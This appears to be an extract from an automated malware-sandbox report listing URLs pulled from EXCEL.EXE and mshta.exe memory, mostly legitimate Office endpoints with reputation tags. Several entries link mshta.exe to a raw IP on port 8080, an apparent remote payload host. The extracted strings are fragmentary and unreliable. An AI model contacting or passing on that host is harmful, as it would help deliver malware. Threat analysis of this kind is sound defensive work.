                https://clients.config.office.net/user/v1.0/android/policiesEEXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpfalse
                  high
                  https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorizeEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                    high
                    https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                      high
                      http://schemas.openEXCEL.EXE, 00000000.00000003.396495769.0000000015C73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.399131900.0000000015C42000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396289594.0000000015D2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396429856.0000000015C42000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396246170.0000000015CE5000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 00000000.00000003.260270306.0000000012FD9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                        high
                        https://settings.outlook.comSEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/emEXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpfalse
                            high
                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpfalse
                              high
                              https://api.aadrm.com/EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                              • URL Reputation: safe
                              unknown
                              https://o365auditrealtimeingestion.manage.office.com0fEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://login.windows.net/common/oauth2/authorize1gEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                high
                                https://login.windows.net/common/oauth2/authorizeAT#EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                  high
                                  https://login.windows.net/common/oauth2/authorizeaRCEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                    high
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                          high
                                          https://cr.office.comEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                            high
                                            https://login.windows.net/common/oauth2/authorizeRTEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                              high
                                              https://api.powerbi.com/v1.0/myorg/groups-EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpfalse
                                                high
                                                https://login.windows.net/common/oauth2/authorizej3CEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOfEXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://tasks.office.comEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                      high
                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonHNzEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://login.windows.net/common/oauth2/authorizeicEEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://login.windows.net/common/oauth2/authorizeizeSUEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dataservice.o365filtering.comxiuEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://149.129.254.1524mshta.exe, 0000001A.00000002.534688222.0000020F08921000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469184261.0000020F08921000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            https://login.windows.net/common/oauth2/authorize;WmEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://api.powerbi.com/v1.0/myorg/groupsBearerEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                    high
                                                                    https://rpsticket.partnerservices.getmicrosoftkey.comBUEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.odwebp.svc.msEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://login.windows.net/common/oauth2/authorizez2sEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                        high
                                                                        https://di.129.254.152:8080/mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        https://login.windows.net/common/oauth2/authorizeOVEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                            high
                                                                            https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://149.129.254.152:8080/6tfcnfucknugget4gpmshta.exe, 0000001A.00000003.469151527.0000020F088F8000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://cr.office.com~EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            low
                                                                            https://graph.windows.netEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                              high
                                                                              https://login.windows.net/common/oauth2/authorizei2LEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://onedrive.live.com/embed?iointiwDEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://insertmedia.bing.office.net/odc/insertmedia_IEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordDEXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://api.onedrive.comMBIEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://login.windows.net/common/oauth2/authorizehbFEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://login.windows.net/common/oauth2/authorizeybuEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://login.windows.net/common/oauth2/authorize/fEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://substrate.office.comaEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://149.129.254.ingsb6mshta.exe, 0000001A.00000002.534688222.0000020F08921000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469184261.0000020F08921000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                high
                                                                                                https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://substrate.office.comgEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                  high
